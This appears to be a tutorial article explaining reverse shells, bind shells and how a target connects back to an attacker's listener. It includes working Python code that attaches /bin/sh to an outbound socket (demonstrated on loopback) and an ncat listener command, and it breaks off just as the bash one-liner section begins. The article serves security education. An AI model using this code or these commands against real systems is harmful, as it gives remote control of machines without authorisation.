What is a Reverse Shell?

A reverse shell is a shell session in which the target machine opens the network connection back to a machine the attacker controls, and the attacker then types commands into, and reads output from, a shell running on the target over that connection. It is usually obtained by exploiting a vulnerability or misconfiguration that lets the attacker execute a single command on the target. It is also known as a “connect-back shell”.

Because the target initiates the connection outbound, the attacker needs no open port on the target, and the traffic usually passes through firewalls and NAT that only restrict inbound connections. The shell runs with the privileges of the process that was exploited, so a reverse shell is often the first step toward a complete takeover of the machine. It is therefore a severe security threat.

The goal is to redirect the standard input, standard output and standard error of a shell on the target over a network connection to the attacker’s machine, so the attacker can drive that shell remotely as if sitting at the keyboard.

How does it work?

In the simplest form of remote shell, the target machine listens on a port and the machine controlled by the attacker connects to it and receives a shell session. This is known as a bind shell.

But what if the target host is not directly reachable, i.e. it has no public IP address (it sits behind NAT) or a firewall blocks inbound connections? In that situation a reverse shell is used: the target machine initiates an outgoing connection to a listening host controlled by the attacker, and a shell session is established over that connection.

To create a reverse shell, you first need a port on your own (attacker) machine that the target can reach, typically a public IP address or a port forwarded through your router. Then you run a listener on that port. Finally, you run a command on the target that connects back to the listener and attaches a shell to that connection.
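The three steps above, worked through end to end as an added example (this is not code from the original article): both sides run in one Python process on the loopback interface so it can be executed offline. The target side only opens an outbound TCP connection and wires /bin/sh's stdin, stdout and stderr to it, exactly the redirection the one-liners later on this page perform; the listener side binds a port, sends commands and reads the output. The address 127.0.0.1, the ephemeral port and the sample commands are assumptions made for the demonstration.

```python
# Added example (not from the original article): a minimal reverse shell
# demonstrated on the loopback interface. The "target" side opens an
# OUTBOUND TCP connection and attaches /bin/sh to it; the "attacker" side
# only listens, writes commands and reads what comes back. 127.0.0.1, the
# ephemeral port and the sample commands are assumptions for this demo.
import socket
import subprocess
import threading


def reverse_shell(host: str, port: int) -> int:
    """Target side: connect back to the listener and hand it a shell.

    Nothing listens on the target: the only socket opened here is an
    outgoing client connection, which is why this works through NAT and
    firewalls that block inbound traffic but allow outbound traffic.
    """
    sock = socket.create_connection((host, port))
    fd = sock.fileno()
    # Redirect the shell's stdin, stdout and stderr to the socket. This is
    # the same wiring a bash /dev/tcp or nc -e one-liner performs.
    proc = subprocess.Popen(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    rc = proc.wait()  # the shell exits when the listener closes its stdin
    sock.close()
    return rc


def handle_connection(server: socket.socket, commands: list[str]) -> str:
    """Attacker side: accept one connection, send commands, collect output."""
    server.settimeout(10)
    conn, _peer = server.accept()
    server.close()
    conn.settimeout(10)
    for cmd in commands:
        conn.sendall(cmd.encode() + b"\n")
    conn.shutdown(socket.SHUT_WR)  # EOF on the shell's stdin, so it exits
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:
            break
        chunks.append(data)
    conn.close()
    return b"".join(chunks).decode(errors="replace")


def run_demo(commands: list[str], host: str = "127.0.0.1") -> str:
    """Run listener and target together and return the shell's output."""
    # Step 1: a port the target can reach (here: any free loopback port).
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, 0))
    server.listen(1)
    port = server.getsockname()[1]
    # Step 3, in a thread standing in for the compromised target: connect
    # back to the listener. Step 2, the listener itself, is handle_connection.
    target = threading.Thread(target=reverse_shell, args=(host, port), daemon=True)
    target.start()
    output = handle_connection(server, commands)
    target.join(timeout=10)
    return output


if __name__ == "__main__":
    print(run_demo(["echo hello from the target", "echo $((6 * 7))"]), end="")
```

In a real engagement the listener is simply `ncat -l 4444` on the attacker's host and the target side is one of the one-liners below; the Python version only makes the two halves and the data flow between them explicit. Note that the target side never calls bind() or listen(), so no new open port appears on the victim, which is also why egress filtering and outbound connection monitoring are the controls that catch this technique.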

Example of a Reverse Shell

To create a reverse shell you need a listener on your own machine at an address the target can reach, typically a public IP address (or a host on the same network as the target).

example:

ncat -l -p 4444

This starts a listener on TCP port 4444 (ncat -l 4444 is the equivalent native ncat form; add -v to be told when a connection arrives).

Let’s assume that the attacker’s machine is reachable at some IP address <IP address>. The following one-liners, executed on the compromised target machine, open a reverse shell connection back to the attacker’s listener:

Bash Reverse Shell

If the target machine runs Linux, it’s a good idea to start with bash, since nearly all Linux systems ship with this shell: